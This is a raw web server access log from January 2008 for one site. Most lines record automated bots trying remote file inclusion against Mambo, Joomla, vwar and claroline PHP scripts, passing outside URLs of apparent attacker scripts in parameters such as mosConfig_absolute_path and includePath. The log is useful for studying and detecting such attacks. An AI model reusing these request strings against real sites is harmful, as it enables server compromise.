83.168.205.154 - - [13/Jan/2008:08:42:42 -0800] "GET /?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:43:18 -0800] "GET /logs/access_071221.log//multithumb/multithumb?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:43:26 -0800] "GET /logs/access_071222.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:43:26 -0800] "GET //?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:43:26 -0800] "GET /logs//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 29972 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:44:07 -0800] "GET /logs/access_071122.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:44:11 -0800] "GET /logs/access_071222.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:44:11 -0800] "GET //?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:44:12 -0800] "GET /logs//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 200 29972 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:44:36 -0800] "GET /logs/access_071205.log//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:45:04 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:40 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:40 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:41 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:41 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:41 -0800] "GET /?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:41 -0800] "GET /?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:41 -0800] "GET /?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:42 -0800] "GET /?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:42 -0800] "GET /logs/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:42 -0800] "GET /logs/?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:43 -0800] "GET /logs/?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.168.187 - - [13/Jan/2008:08:45:43 -0800] "GET /logs/?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 200 29967 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.206 - - [13/Jan/2008:08:45:46 -0800] "GET /logs/access_071002.log HTTP/1.0" 200 70737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:45:52 -0800] "GET /logs/access_071229.log/vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:45:52 -0800] "GET /vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:45:52 -0800] "GET /logs/vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:46:28 -0800] "GET /logs/access_071122.log//?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.65.96.182 - - [13/Jan/2008:08:46:41 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.165.146 - - [13/Jan/2008:08:47:51 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.165.146 - - [13/Jan/2008:08:47:51 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.165.146 - - [13/Jan/2008:08:47:51 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:48:12 -0800] "GET /logs/access_071229.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:48:12 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:48:13 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.12.20 - - [13/Jan/2008:08:48:51 -0800] "GET /logs/access_071122.log//?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:49:38 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [13/Jan/2008:08:49:38 -0800] "GET /logs/access_071214.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:49:58 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:49:58 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:49:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:08:50:25 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:08:50:25 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.220.64.3 - - [13/Jan/2008:08:53:01 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.67.192.5 - - [13/Jan/2008:08:53:15 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.213.202.11 - - [13/Jan/2008:08:53:36 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.202.11 - - [13/Jan/2008:08:53:36 -0800] "GET /convert/mvcw.php?vwar_root=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.202.11 - - [13/Jan/2008:08:53:36 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:53:58 -0800] "GET /logs/access_071205.log/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.202.11 - - [13/Jan/2008:08:54:57 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:55:40 -0800] "GET /logs/access_071229.log/vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:55:40 -0800] "GET /vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:55:40 -0800] "GET /logs/vwar/admin/?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:55:51 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:55:51 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:55:52 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.50.2 - - [13/Jan/2008:08:56:12 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:08:56:44 -0800] "GET //intern/config/key_2.php?rootdir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:08:56:44 -0800] "GET /logs//intern/config/key_2.php?rootdir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:08:57:44 -0800] "GET /logs/access_071205.log//?CONFIG_EXT[LIB_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:08:58:13 -0800] "GET //intern/clan/member_add.php?rootdir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
207.44.188.10 - - [13/Jan/2008:08:58:23 -0800] "GET /logs//intern/clan/member_add.php?rootdir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.76.186.87 - - [13/Jan/2008:08:58:54 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [13/Jan/2008:08:59:30 -0800] "GET /logs/access_071229.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [13/Jan/2008:08:59:30 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [13/Jan/2008:08:59:31 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:59:58 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:59:58 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [13/Jan/2008:08:59:58 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:09:00:39 -0800] "GET /minamijewelry/source_images/147.jpg HTTP/1.0" 200 23368 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:09:01:08 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:09:01:08 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.35.198 - - [13/Jan/2008:09:01:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [13/Jan/2008:09:01:11 -0800] "GET /logs/access_071214.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://binat.de/new/cm1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.31 - - [13/Jan/2008:09:01:34 -0800] "GET /minamijewelry/source_images/screen-skiitsu-big.jpg HTTP/1.0" 200 51406 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:09:02:05 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.232.156 - - [13/Jan/2008:09:02:05 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:13 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:13 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:13 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [13/Jan/2008:09:02:14 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:14 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.arkitektsolli.no//script/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.19 - - [13/Jan/2008:09:02:15 -0800] "GET /minamijewelry/html/ HTTP/1.0" 200 13288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.88.203.194 - - [13/Jan/2008:09:02:15 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.217.23 - - [13/Jan/2008:09:02:16 -0800] "GET /logs/access_071222.log//?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.217.23 - - [13/Jan/2008:09:02:17 -0800] "GET //?mosConfig_absolute_path=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
